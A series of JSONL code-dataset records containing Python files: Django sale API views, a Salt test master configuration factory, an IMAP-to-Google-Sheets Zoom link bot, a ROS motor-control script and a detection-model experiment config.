get_sk_tickets,\r\n 'customer_contacts': get_customer_contacts,\r\n 'modems': get_modems,\r\n 'customers': get_customers,\r\n 'snr_us': wrapper_get_proviso_data('snr_us'),\r\n 'precer_us': wrapper_get_proviso_data('precer_us'),\r\n 'pocer_us': wrapper_get_proviso_data('pocer_us'),\r\n 't_power_us': wrapper_get_proviso_data('t_power_us'),\r\n 'r_power_us': wrapper_get_proviso_data('r_power_us'),\r\n 'r_power_ds_min': wrapper_get_proviso_data('r_power_ds_min'),\r\n 'r_power_ds_max': wrapper_get_proviso_data('r_power_ds_max'),\r\n 'pocer_ds_max': wrapper_get_proviso_data('pocer_ds_max'),\r\n 'precer_ds_max': wrapper_get_proviso_data('precer_ds_max'),\r\n 'snr_ds_min': wrapper_get_proviso_data('snr_ds_min'),\r\n 't3_timeout': wrapper_t3_t4_timeouts('t3_count'),\r\n 't4_timeout': wrapper_t3_t4_timeouts('t4_count')\r\n }\r\n","sub_path":"franz/src/lib/modules/rawdata.py","file_name":"rawdata.py","file_ext":"py","file_size_in_byte":42815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351019492","text":"from django.db.models import Q, F\nfrom rest_framework.response import Response\nfrom rest_framework import generics\nfrom django.contrib.auth import get_user_model\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\nfrom rest_framework import pagination\nfrom .pagination import PostLimitOffsetPagination\nfrom ...sale.models import Sales\nfrom ...sale.models import SoldItem as Item\nfrom .serializers import (\n ListSaleSerializer,\n CreateSaleSerializer,\n ItemSerializer\n)\n\nimport logging\nfrom rest_framework.request import Request\nfrom rest_framework.test import APIRequestFactory\n\nUser = get_user_model()\ndebug_logger = logging.getLogger('debug_logger')\ninfo_logger = logging.getLogger('info_logger')\nerror_logger = logging.getLogger('error_logger')\n\nfactory = APIRequestFactory()\nrequest = factory.get('/')\nserializer_context = {\n 'request': Request(request),\n}\n\n\nclass SaleDetailAPIView(generics.RetrieveAPIView):\n queryset = Sales.objects.all()\n serializer_class = ListSaleSerializer\n\n\nclass SaleCreateAPIView(generics.CreateAPIView):\n queryset = Sales.objects.all()\n serializer_class = CreateSaleSerializer\n\n def perform_create(self, serializer): \n serializer.save(user=self.request.user) \n\n \nclass SaleListAPIView(generics.ListAPIView):\n serializer_class = ListSaleSerializer\n\n def get_queryset(self, *args, **kwargs): \n queryset_list = Sales.objects.all()\n query = self.request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(invoice_number__icontains=query) \n ).distinct()\n return queryset_list\n\n\nclass ListAPIView(generics.ListAPIView):\n \"\"\"\n list details\n GET /api/setting/\n \"\"\"\n serializer_class = ListSaleSerializer\n permission_classes = (IsAuthenticatedOrReadOnly,)\n pagination_class = PostLimitOffsetPagination\n\n def get_serializer_context(self):\n if self.request.GET.get('date'):\n return {\"date\": self.request.GET.get('date'), 'request': self.request}\n return {\"date\": None, 'request': self.request}\n\n def get_queryset(self, *args, **kwargs):\n try:\n if self.kwargs['pk']:\n queryset_list = Sales.objects.filter(customer__pk=self.kwargs['pk']).order_by('car').distinct('car').select_related()\n else:\n queryset_list = Sales.objects.all.select_related()\n except Exception as e:\n queryset_list = Sales.objects.all()\n\n page_size = 'page_size'\n if self.request.GET.get(page_size):\n pagination.PageNumberPagination.page_size = 
self.request.GET.get(page_size)\n else:\n pagination.PageNumberPagination.page_size = 10\n if self.request.GET.get('date'):\n queryset_list = queryset_list.filter(date__icontains=self.request.GET.get('date'))\n\n query = self.request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(invoice_number__icontains=query))\n return queryset_list.order_by('-id')\n\n\nclass ListItemAPIView(generics.ListAPIView):\n \"\"\"\n list details\n GET /api/sale/list/items/\n \"\"\"\n serializer_class = ItemSerializer\n permission_classes = (IsAuthenticatedOrReadOnly,)\n pagination_class = PostLimitOffsetPagination\n\n def get_serializer_context(self):\n if self.request.GET.get('date'):\n return {\"date\": self.request.GET.get('date'), 'request': self.request}\n return {\"date\": None, 'request': self.request}\n\n def get_queryset(self, *args, **kwargs):\n queryset_list = Item.objects.filter(quantity__gt=F('returned_quantity'))\n try:\n if self.kwargs['pk']:\n queryset_list = queryset_list.filter(sales__pk=self.kwargs['pk']).select_related()\n\n except Exception as e:\n pass\n\n page_size = 'page_size'\n if self.request.GET.get(page_size):\n pagination.PageNumberPagination.page_size = self.request.GET.get(page_size)\n else:\n pagination.PageNumberPagination.page_size = 10\n if self.request.GET.get('date'):\n queryset_list = queryset_list.filter(date__icontains=self.request.GET.get('date'))\n\n query = self.request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(product_name__icontains=query) |\n Q(sku__icontains=query)\n )\n return queryset_list.order_by('-id')\n\n\n\n","sub_path":"saleor/api/sale/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147907443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nsaltfactories.factories.master\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMaster Factory\n\"\"\"\n\ntry:\n import salt.config\n import salt.utils.files\n import salt.utils.dictupdate\nexcept ImportError: # pragma: no cover\n # We need salt to test salt with saltfactories, and, when pytest is rewriting modules for proper assertion\n # reporting, we still haven't had a chance to inject the salt path into sys.modules, so we'll hit this\n # import error, but its safe to pass\n pass\n\nfrom saltfactories.utils import ports\n\n\nclass MasterFactory(object):\n @staticmethod\n def default_config(\n root_dir, master_id, config_defaults=None, config_overrides=None, order_masters=False,\n ):\n if config_defaults is None:\n config_defaults = salt.config.DEFAULT_MASTER_OPTS.copy()\n config_defaults.pop(\"user\", None)\n\n conf_dir = root_dir.join(\"conf\").ensure(dir=True)\n conf_file = conf_dir.join(\"master\").strpath\n state_tree_root = root_dir.join(\"state-tree\").ensure(dir=True)\n state_tree_root_base = state_tree_root.join(\"base\").ensure(dir=True).strpath\n state_tree_root_prod = state_tree_root.join(\"prod\").ensure(dir=True).strpath\n pillar_tree_root = root_dir.join(\"pillar-tree\").ensure(dir=True)\n pillar_tree_root_base = pillar_tree_root.join(\"base\").ensure(dir=True).strpath\n pillar_tree_root_prod = pillar_tree_root.join(\"prod\").ensure(dir=True).strpath\n\n _config_defaults = {\n \"id\": master_id,\n \"conf_file\": conf_file,\n \"root_dir\": root_dir.strpath,\n \"interface\": \"127.0.0.1\",\n \"publish_port\": ports.get_unused_localhost_port(),\n \"ret_port\": ports.get_unused_localhost_port(),\n \"tcp_master_pub_port\": 
ports.get_unused_localhost_port(),\n \"tcp_master_pull_port\": ports.get_unused_localhost_port(),\n \"tcp_master_publish_pull\": ports.get_unused_localhost_port(),\n \"tcp_master_workers\": ports.get_unused_localhost_port(),\n \"worker_threads\": 3,\n \"pidfile\": \"run/master.pid\",\n \"pki_dir\": \"pki\",\n \"cachedir\": \"cache\",\n \"timeout\": 3,\n \"sock_dir\": \"run/master\",\n \"fileserver_list_cache_time\": 0,\n \"fileserver_backend\": [\"roots\"],\n \"pillar_opts\": False,\n \"peer\": {\".*\": [\"test.*\"]},\n \"log_file\": \"logs/master.log\",\n \"log_level_logfile\": \"debug\",\n \"key_logfile\": \"logs/key.log\",\n \"token_dir\": \"tokens\",\n \"token_file\": root_dir.join(\"ksfjhdgiuebfgnkefvsikhfjdgvkjahcsidk\").strpath,\n \"file_buffer_size\": 8192,\n \"log_fmt_console\": \"%(asctime)s,%(msecs)03.0f [%(name)-17s:%(lineno)-4d][%(levelname)-8s][%(processName)18s(%(process)d)] %(message)s\",\n \"log_fmt_logfile\": \"[%(asctime)s,%(msecs)03.0f][%(name)-17s:%(lineno)-4d][%(levelname)-8s][%(processName)18s(%(process)d)] %(message)s\",\n \"file_roots\": {\"base\": state_tree_root_base, \"prod\": state_tree_root_prod},\n \"pillar_roots\": {\"base\": pillar_tree_root_base, \"prod\": pillar_tree_root_prod},\n \"hash_type\": \"sha256\",\n \"transport\": \"zeromq\",\n \"order_masters\": order_masters,\n \"max_open_files\": 10240,\n \"pytest-master\": {\"log\": {\"prefix\": \"{{cli_name}}({})\".format(master_id)},},\n }\n # Merge in the initial default options with the internal _config_defaults\n salt.utils.dictupdate.update(config_defaults, _config_defaults, merge_lists=True)\n\n if config_overrides:\n # Merge in the default options with the master_config_overrides\n salt.utils.dictupdate.update(config_defaults, config_overrides, merge_lists=True)\n\n return config_defaults\n","sub_path":"saltfactories/factories/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169553931","text":"import imaplib\nimport email\nimport email.message\nimport pygsheets # external\nimport time\nfrom datetime import datetime\nimport pytz # external\nimport json\nimport re\nimport tldextract # external\n\ndef get_lesson_num(t):\n if t < 9*60 + 15:\n return 0\n elif t < 10*60 + 10:\n return 1\n elif t < 11*60 + 15:\n return 2\n elif t < 12*60 + 20:\n return 3\n elif t < 13*60 + 15:\n return 4\n elif t < 14*60 + 20:\n return 5\n elif t < 15*60 + 25:\n return 6\n else:\n return -1\n\ndef get_text(email_message_instance):\n res = \"\"\n maintype = email_message_instance.get_content_maintype()\n if maintype == 'multipart':\n for part in email_message_instance.get_payload():\n if part.get_content_maintype() == 'text':\n chset = part.get_content_charset()\n res += part.get_payload(decode=True).decode(chset)\n elif maintype == 'text':\n chset = email_message_instance.get_content_charset()\n res+= email_message_instance.get_payload(decode=True).decode(chset)\n return res\n\nwith open(\"credentials.json\", \"r\") as read_file:\n credentials = json.load(read_file)\nmail = imaplib.IMAP4_SSL(\"imap.mail.ru\")\nmail.login(credentials[\"login\"], credentials[\"password\"])\nmail.select('INBOX')\n\ngc = pygsheets.authorize(service_file='serviceacc.json')\nwk = gc.open_by_key(credentials[\"sheet_id\"])[0]\ntt = gc.open_by_key(credentials[\"timetable_id\"])[0]\n\ntz = pytz.timezone('Europe/Moscow')\n\nlast_uid = tt.get_value('H1')\nprint(last_uid)\nif last_uid == \"null\":\n result, data = 
mail.uid('search', None, \"ALL\")\n last_uid = data[0].split()[-1]\n tt.update_value('H1', last_uid.decode(\"utf-8\"))\nelse:\n last_uid = last_uid.encode(\"utf-8\")\nprint(last_uid)\nnow = datetime.now(tz)\ncurrLessonNum = get_lesson_num(now.hour*60 + now.minute)\nif currLessonNum == -1:\n lesson = \"null\"\nelse: \n lesson = tt.cell((currLessonNum+1, now.weekday()+1)).value\nallCells = wk.range(wk.cell((1, 1)).label + ':' + wk.cell((wk.rows, wk.cols)).label)\nfor r in allCells:\n for c in r:\n c.color = (1.0, 1.0, 1.0, 1.0)\nif lesson != \"null\":\n for row, uid in enumerate(wk.get_col(5)):\n if uid == lesson:\n r = wk.range(wk.cell((row+1, 1)).label + ':' + wk.cell((row+1, wk.cols)).label)[0]\n for c in r:\n c.color = (0.57, 0.79, 0.47, 1.0)\nlastLessonNum = currLessonNum\nprint('Ready!')\nprint('Waiting...')\ntime.sleep(60)\n\nwhile True:\n print('Checking...')\n print(last_uid)\n now = datetime.now(tz)\n currLessonNum = get_lesson_num(now.hour*60 + now.minute)\n if currLessonNum != lastLessonNum:\n print(\"Lesson change!\")\n if currLessonNum == -1:\n lesson = \"null\"\n else: \n lesson = tt.cell((currLessonNum+1, now.weekday()+1)).value\n allCells = wk.range(wk.cell((1, 1)).label + ':' + wk.cell((wk.rows, wk.cols)).label)\n for r in allCells:\n for c in r:\n c.color = (1.0, 1.0, 1.0, 1.0)\n if lesson != \"null\":\n for row, uid in enumerate(wk.get_col(5)):\n if uid == lesson:\n r = wk.range(wk.cell((row+1, 1)).label + ':' + wk.cell((row+1, wk.cols)).label)[0]\n for c in r:\n c.color = (0.57, 0.79, 0.47, 1.0)\n lastLessonNum = currLessonNum\n try:\n result, data = mail.uid('search', None, \"ALL\")\n uidList = data[0].split()\n curr_uid = uidList[-1]\n if curr_uid != last_uid:\n try:\n start_index = uidList.index(last_uid)\n except ValueError:\n start_index = len(uidList) - 1\n while last_uid < uidList[start_index]:\n start_index -= 1\n for i in range(start_index + 1, len(uidList)):\n result, data = mail.uid('fetch', uidList[i], '(RFC822)')\n raw_email = data[0][1]\n email_message = email.message_from_bytes(raw_email)\n from_addr = email.utils.parseaddr(email_message['From'])[1]\n contents = get_text(email_message)\n urls = re.findall(r'(https?://[^\\s]+)', contents)\n zoom_link = \"\"\n found = False\n for url in urls:\n ex = tldextract.extract(url)\n if ex.domain == 'zoom' and ex.suffix == 'us':\n zoom_link = url\n found = True\n break\n if found:\n print('Found!')\n for row, addrs in enumerate(wk.get_col(4)):\n if addrs.find(from_addr) != -1:\n wk.cell((row+1, 2)).set_value(zoom_link)\n wk.cell((row+1, 3)).set_value(datetime.now(tz).strftime(\"%H:%M %b-%d\"))\n last_uid = curr_uid\n tt.update_value('H1', last_uid.decode(\"utf-8\"))\n except imaplib.IMAP4.abort:\n mail = imaplib.IMAP4_SSL(\"imap.mail.ru\")\n mail.login(credentials[\"login\"], credentials[\"password\"])\n mail.select('INBOX')\n continue\n \n print('Waiting...')\n now = datetime.now(tz)\n hrs = now.hour\n wd = now.weekday()\n if wd == 6:\n time.sleep((24-hrs)*3600)\n elif hrs >= 16 and hrs < 22:\n time.sleep(3600)\n elif hrs >= 22:\n time.sleep((30-hrs)*3600)\n elif hrs <= 5:\n time.sleep((6-hrs)*3600)\n else:\n time.sleep(60)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"99350491","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom std_msgs.msg import String\nimport contextlib\nimport sys\nimport termios\nimport time\nimport message_filters\n\n@contextlib.contextmanager\ndef 
raw_mode(file):\n old_attrs = termios.tcgetattr(file.fileno())\n new_attrs = old_attrs[:]\n new_attrs[3] = new_attrs[3] & ~(termios.ECHO | termios.ICANON)\n try:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, new_attrs)\n yield\n finally:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, old_attrs)\n\n# def xyz(data):\nkeypress='x'\npkey='x'\n\npub = rospy.Publisher('motor_cmd', String, queue_size=10)\npwml=50\npwmr=50\ntomove=0\ntarget =90\ninitial=0\n# bear=50\n# encd=0\nglobal target_encd\nglobal keypress\nglobal initial\nglobal target\n\n\n\nangle=0\n\ndef callbackEncd(data):\n global encd\n encd=data.data\n\ndef callbackBear(data):\n global bear\n bear=data.data\n\n\ndef move2():\n subencd=rospy.Subscriber('encoderl', String, callbackEncd)\n subbear=rospy.Subscriber('bearing', String, callbackBear)\n\n global encd\n global bear\n\n # bear=bear_data.data\n # encd=encd_data\n\n global flagw\n if(flagw==0):\n global encd\n global bear\n flagw=1\n global initial_bear\n global initial_encd\n global target_encd\n global tomove\n initial_bear=int(float(bear))\n initial_encd=int(encd)\n target_encd=initial_encd+tomove\n rate = rospy.Rate(100) # 10hz\n \n # keypress='w'\n cur_bear=int(float(bear))\n cur_encd=int(float(encd))\n global initial\n global t_factor\n global keypress\n if(initial_bear-cur_bear<-300):\n cur_bear=cur_bear-360\n elif(initial_bear-cur_bear>300):\n cur_bear=cur_bear+360\n\n if(abs(initial_bear-cur_bear)<=2):\n t_factor=factor\n else:\n t_factor=t_factor+0.005\n if(keypress[0]=='w'):\n pwml=50+(initial_bear-cur_bear)*t_factor\n pwmr=50+(cur_bear-initial_bear)*t_factor\n elif(keypress[0]=='s'):\n pwml=50-(initial_bear-cur_bear)*t_factor\n pwmr=50-(cur_bear-initial_bear)*t_factor\n if(abs(cur_encd-initial_encd)>tomove):\n keypress='x'\n pwmr=100\n pwml=100\n # rospy.loginfo(keypress)\n topub=keypress[0]+\" \"+str(pwml)+\" \"+str(pwmr)\n rospy.loginfo(topub+\" \" +str(encd)+\" \"+str(bear))\n pub.publish(topub)\n rate.sleep()\n if(abs(cur_encd-initial_encd)>tomove):\n # global bear_data\n # global encoder_data\n subbear.unregister()\n subencd.unregister()\n # # rospy.loginfo(subforw)\n # # ts.disconnect()\n\n\ndef callbackRotate(data):\n global flagr\n global angle\n if(flagr==0):\n global target\n global keypress\n flagr=1\n initial=int(float(data.data))\n if(keypress[0]=='d'):\n target=initial+int(float(angle))\n if(target>=360):\n target=target-360\n elif(keypress[0]=='a'):\n target=initial-int(float(angle))\n if(target<0):\n target=target+360\n \n rate = rospy.Rate(100) # 10hz\n global target\n cur_bear=int(float(data.data))\n \n global t_factor\n\n pwml=13\n pwmr=13\n\n if(abs(target-cur_bear)>3):\n if((target-cur_bear)>3):\n keypress='d'\n else:\n keypress='a'\n global initial\n if(initial-cur_bear<-300):\n cur_bear=cur_bear-360\n elif(initial-cur_bear>300):\n cur_bear=cur_bear+360\n\n if(abs(initial-cur_bear)<=2):\n t_factor=factor\n else:\n t_factor=t_factor+0.005\n \n topub=keypress+\" \"+str(pwml)+\" \"+str(pwmr)\n rospy.loginfo(topub+\" \" +data.data+\" \"+str(target))\n pub.publish(topub)\n rate.sleep()\n else:\n global subonce\n keypress='x'\n topub=keypress+\" \"+str(pwml)+\" \"+str(pwmr)\n rospy.loginfo(topub+\" \" +data.data+\" \"+str(target))\n pub.publish(topub)\n rate.sleep()\n subonce.unregister()\n\ndef rotate():\n global subonce\n subonce=rospy.Subscriber('bearing', String, callbackRotate)\n\n\ndef takeCommand():\n global keypress\n rospy.init_node('motor_cmd_teller', anonymous=True)\n while True:\n keypress=raw_input('hh: ')\n 
rospy.loginfo(\"enter\\n\")\n if(keypress[0]=='w'):\n global flagw\n flagw=0\n # rospy.Subscriber('encoderl',String,callback0)\n dist=keypress[2:]\n global tomove\n tomove=int(dist)*1.2 #assign target encoder reading\n rospy.loginfo(str(tomove))\n move2()\n elif(keypress[0]=='s'):\n dist=keypress[2:]\n global tomove\n tomove=int(dist)*1.2 #assign target encoder reading\n rospy.loginfo(str(tomove))\n move()\n elif(keypress[0]=='a' or keypress[0]=='d'):\n global flagr\n flagr=0\n global angle\n angle=keypress[2:]\n rotate()\n elif(keypress[0]=='/'):\n break;\n\nif __name__ == '__main__':\n factor=1.3\n flag=0\n try:\n # while True:\n takeCommand()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"src/beginner_package/scripts/publishMotorCommands_5.py","file_name":"publishMotorCommands_5.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189181973","text":"#!/usr/bin/env python\n# Copyright 2018 Division of Medical Image Computing, German Cancer Research Center (DKFZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.realpath(__file__)))\nimport numpy as np\nfrom default_configs import DefaultConfigs\n\nclass configs(DefaultConfigs):\n\n def __init__(self, server_env=None):\n\n #########################\n # Preprocessing #\n #########################\n\n self.root_dir = '/home/gregor/datasets/toy_mdt'\n\n #########################\n # I/O #\n #########################\n\n\n # one out of [2, 3]. dimension the model operates in.\n self.dim = 2\n\n # one out of ['mrcnn', 'retina_net', 'retina_unet', 'detection_unet', 'ufrcnn', 'detection_unet'].\n self.model = 'mrcnn'\n\n DefaultConfigs.__init__(self, self.model, server_env, self.dim)\n\n # int [0 < dataset_size]. select n patients from dataset for prototyping.\n self.select_prototype_subset = None\n self.hold_out_test_set = True\n # including val set. 
will be 3/4 train, 1/4 val.\n self.n_train_val_data = 1500\n\n # choose one of the 3 toy experiments described in https://arxiv.org/pdf/1811.08661.pdf\n # one of ['donuts_shape', 'donuts_pattern', 'circles_scale'].\n toy_mode = 'donuts_shape_noise'\n\n\n # path to preprocessed data.\n self.input_df_name = 'info_df.pickle'\n self.pp_name = os.path.join(toy_mode, 'train')\n self.pp_data_path = os.path.join(self.root_dir, self.pp_name)\n self.pp_test_name = os.path.join(toy_mode, 'test')\n self.pp_test_data_path = os.path.join(self.root_dir, self.pp_test_name)\n\n # settings for deployment in cloud.\n if server_env:\n # path to preprocessed data.\n pp_root_dir = '/datasets/datasets_ramien/toy_exp/data'\n self.pp_name = os.path.join(toy_mode, 'train')\n self.pp_data_path = os.path.join(pp_root_dir, self.pp_name)\n self.pp_test_name = os.path.join(toy_mode, 'test')\n self.pp_test_data_path = os.path.join(pp_root_dir, self.pp_test_name)\n self.select_prototype_subset = None\n\n #########################\n # Data Loader #\n #########################\n\n # select modalities from preprocessed data\n self.channels = [0]\n self.n_channels = len(self.channels)\n\n # patch_size to be used for training. pre_crop_size is the patch_size before data augmentation.\n self.pre_crop_size_2D = [320, 320]\n self.patch_size_2D = [320, 320]\n\n self.patch_size = self.patch_size_2D if self.dim == 2 else self.patch_size_3D\n self.pre_crop_size = self.pre_crop_size_2D if self.dim == 2 else self.pre_crop_size_3D\n\n # ratio of free sampled batch elements before class balancing is triggered\n # (>0 to include \"empty\"/background patches.)\n self.batch_sample_slack = 0.2\n\n # set 2D network to operate in 3D images.\n self.merge_2D_to_3D_preds = False\n\n # feed +/- n neighbouring slices into channel dimension. 
set to None for no context.\n self.n_3D_context = None\n if self.n_3D_context is not None and self.dim == 2:\n self.n_channels *= (self.n_3D_context * 2 + 1)\n\n\n #########################\n # Architecture #\n #########################\n\n self.start_filts = 48 if self.dim == 2 else 18\n self.end_filts = self.start_filts * 4 if self.dim == 2 else self.start_filts * 2\n self.res_architecture = 'resnet50' # 'resnet101' , 'resnet50'\n self.norm = None # one of None, 'instance_norm', 'batch_norm'\n self.weight_decay = 0\n\n # one of 'xavier_uniform', 'xavier_normal', or 'kaiming_normal', None (=default = 'kaiming_uniform')\n self.weight_init = None\n\n #########################\n # Schedule / Selection #\n #########################\n\n self.num_epochs = 24\n self.num_train_batches = 100 if self.dim == 2 else 200\n self.batch_size = 20 if self.dim == 2 else 8\n\n self.do_validation = True\n # decide whether to validate on entire patient volumes (like testing) or sampled patches (like training)\n # the former is morge accurate, while the latter is faster (depending on volume size)\n self.val_mode = 'val_patient' # one of 'val_sampling' , 'val_patient'\n if self.val_mode == 'val_patient':\n self.max_val_patients = None # if 'None' iterates over entire val_set once.\n if self.val_mode == 'val_sampling':\n self.num_val_batches = 50\n\n #########################\n # Testing / Plotting #\n #########################\n\n # set the top-n-epochs to be saved for temporal averaging in testing.\n self.save_n_models = 5\n self.test_n_epochs = 5\n\n # set a minimum epoch number for saving in case of instabilities in the first phase of training.\n self.min_save_thresh = 0 if self.dim == 2 else 0\n\n self.report_score_level = ['patient', 'rois'] # choose list from 'patient', 'rois'\n self.class_dict = {1: 'benign', 2: 'malignant'} # 0 is background.\n self.patient_class_of_interest = 2 # patient metrics are only plotted for one class.\n self.ap_match_ious = [0.1] # list of ious to be evaluated for ap-scoring.\n\n self.model_selection_criteria = ['benign_ap', 'malignant_ap'] # criteria to average over for saving epochs.\n self.min_det_thresh = 0.1 # minimum confidence value to select predictions for evaluation.\n\n # threshold for clustering predictions together (wcs = weighted cluster scoring).\n # needs to be >= the expected overlap of predictions coming from one model (typically NMS threshold).\n # if too high, preds of the same object are separate clusters.\n self.wcs_iou = 1e-5\n\n self.plot_prediction_histograms = True\n self.plot_stat_curves = False\n\n #########################\n # Data Augmentation #\n #########################\n\n self.da_kwargs={\n 'do_elastic_deform': True,\n 'alpha':(0., 1500.),\n 'sigma':(30., 50.),\n 'do_rotation':True,\n 'angle_x': (0., 2 * np.pi),\n 'angle_y': (0., 0),\n 'angle_z': (0., 0),\n 'do_scale': True,\n 'scale':(0.8, 1.1),\n 'random_crop':False,\n 'rand_crop_dist': (self.patch_size[0] / 2. - 3, self.patch_size[1] / 2. 
- 3),\n 'border_mode_data': 'constant',\n 'border_cval_data': 0,\n 'order_data': 1\n }\n\n if self.dim == 3:\n self.da_kwargs['do_elastic_deform'] = False\n self.da_kwargs['angle_x'] = (0, 0.0)\n self.da_kwargs['angle_y'] = (0, 0.0) #must be 0!!\n self.da_kwargs['angle_z'] = (0., 2 * np.pi)\n\n\n #########################\n # Add model specifics #\n #########################\n\n {'detection_unet': self.add_det_unet_configs,\n 'mrcnn': self.add_mrcnn_configs,\n 'ufrcnn': self.add_mrcnn_configs,\n 'ufrcnn_surrounding': self.add_mrcnn_configs,\n 'retina_net': self.add_mrcnn_configs,\n 'retina_unet': self.add_mrcnn_configs,\n 'prob_detector': self.add_mrcnn_configs,\n }[self.model]()\n\n\n def add_det_unet_configs(self):\n\n self.learning_rate = [1e-4] * self.num_epochs\n\n # aggregation from pixel perdiction to object scores (connected component). One of ['max', 'median']\n self.aggregation_operation = 'max'\n\n # max number of roi candidates to identify per image (slice in 2D, volume in 3D)\n self.n_roi_candidates = 3 if self.dim == 2 else 8\n\n # loss mode: either weighted cross entropy ('wce'), batch-wise dice loss ('dice), or the sum of both ('dice_wce')\n self.seg_loss_mode = 'dice_wce'\n\n # if <1, false positive predictions in foreground are penalized less.\n self.fp_dice_weight = 1 if self.dim == 2 else 1\n\n self.wce_weights = [1, 1, 1]\n self.detection_min_confidence = self.min_det_thresh\n\n # if 'True', loss distinguishes all classes, else only foreground vs. background (class agnostic).\n self.class_specific_seg_flag = True\n self.num_seg_classes = 3 if self.class_specific_seg_flag else 2\n self.head_classes = self.num_seg_classes\n\n def add_mrcnn_configs(self):\n\n # learning rate is a list with one entry per epoch.\n self.learning_rate = [1e-4] * self.num_epochs\n\n # disable mask head loss. (e.g. if no pixelwise annotations available)\n self.frcnn_mode = False\n\n # disable the re-sampling of mask proposals to original size for speed-up.\n # since evaluation is detection-driven (box-matching) and not instance segmentation-driven (iou-matching),\n # mask-outputs are optional.\n self.return_masks_in_val = True\n self.return_masks_in_test = False\n\n # set number of proposal boxes to plot after each epoch.\n self.n_plot_rpn_props = 5 if self.dim == 2 else 30\n\n # number of classes for head networks: n_foreground_classes + 1 (background)\n self.head_classes = 3\n\n # seg_classes hier refers to the first stage classifier (RPN)\n self.num_seg_classes = 2 # foreground vs. background\n\n # feature map strides per pyramid level are inferred from architecture.\n self.backbone_strides = {'xy': [4, 8, 16, 32], 'z': [1, 2, 4, 8]}\n\n # anchor scales are chosen according to expected object sizes in data set. Default uses only one anchor scale\n # per pyramid level. (outer list are pyramid levels (corresponding to BACKBONE_STRIDES), inner list are scales per level.)\n self.rpn_anchor_scales = {'xy': [[8], [16], [32], [64]], 'z': [[2], [4], [8], [16]]}\n\n # choose which pyramid levels to extract features from: P2: 0, P3: 1, P4: 2, P5: 3.\n self.pyramid_levels = [0, 1, 2, 3]\n\n # number of feature maps in rpn. 
typically lowered in 3D to save gpu-memory.\n self.n_rpn_features = 512 if self.dim == 2 else 128\n\n # anchor ratios and strides per position in feature maps.\n self.rpn_anchor_ratios = [0.5, 1, 2]\n self.rpn_anchor_stride = 1\n\n # Threshold for first stage (RPN) non-maximum suppression (NMS): LOWER == HARDER SELECTION\n self.rpn_nms_threshold = 0.7 if self.dim == 2 else 0.7\n\n # loss sampling settings.\n self.rpn_train_anchors_per_image = 2 #per batch element\n self.train_rois_per_image = 2 #per batch element\n self.roi_positive_ratio = 0.5\n self.anchor_matching_iou = 0.7\n\n # factor of top-k candidates to draw from per negative sample (stochastic-hard-example-mining).\n # poolsize to draw top-k candidates from will be shem_poolsize * n_negative_samples.\n self.shem_poolsize = 10\n\n self.pool_size = (7, 7) if self.dim == 2 else (7, 7, 3)\n self.mask_pool_size = (14, 14) if self.dim == 2 else (14, 14, 5)\n self.mask_shape = (28, 28) if self.dim == 2 else (28, 28, 10)\n\n self.rpn_bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])\n self.bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])\n self.window = np.array([0, 0, self.patch_size[0], self.patch_size[1]])\n self.scale = np.array([self.patch_size[0], self.patch_size[1], self.patch_size[0], self.patch_size[1]])\n\n if self.dim == 2:\n self.rpn_bbox_std_dev = self.rpn_bbox_std_dev[:4]\n self.bbox_std_dev = self.bbox_std_dev[:4]\n self.window = self.window[:4]\n self.scale = self.scale[:4]\n\n # pre-selection in proposal-layer (stage 1) for NMS-speedup. applied per batch element.\n self.pre_nms_limit = 3000 if self.dim == 2 else 6000\n\n # n_proposals to be selected after NMS per batch element. too high numbers blow up memory if \"detect_while_training\" is True,\n # since proposals of the entire batch are forwarded through second stage in as one \"batch\".\n self.roi_chunk_size = 800 if self.dim == 2 else 600\n self.post_nms_rois_training = 500 if self.dim == 2 else 75\n self.post_nms_rois_inference = 500\n\n # Final selection of detections (refine_detections)\n self.model_max_instances_per_batch_element = 10 if self.dim == 2 else 30 # per batch element and class.\n self.detection_nms_threshold = 1e-5 # needs to be > 0, otherwise all predictions are one cluster.\n self.model_min_confidence = 0.1\n\n if self.dim == 2:\n self.backbone_shapes = np.array(\n [[int(np.ceil(self.patch_size[0] / stride)),\n int(np.ceil(self.patch_size[1] / stride))]\n for stride in self.backbone_strides['xy']])\n else:\n self.backbone_shapes = np.array(\n [[int(np.ceil(self.patch_size[0] / stride)),\n int(np.ceil(self.patch_size[1] / stride)),\n int(np.ceil(self.patch_size[2] / stride_z))]\n for stride, stride_z in zip(self.backbone_strides['xy'], self.backbone_strides['z']\n )])\n if self.model == 'ufrcnn':\n self.operate_stride1 = True\n self.class_specific_seg_flag = True\n self.num_seg_classes = 3 if self.class_specific_seg_flag else 2\n 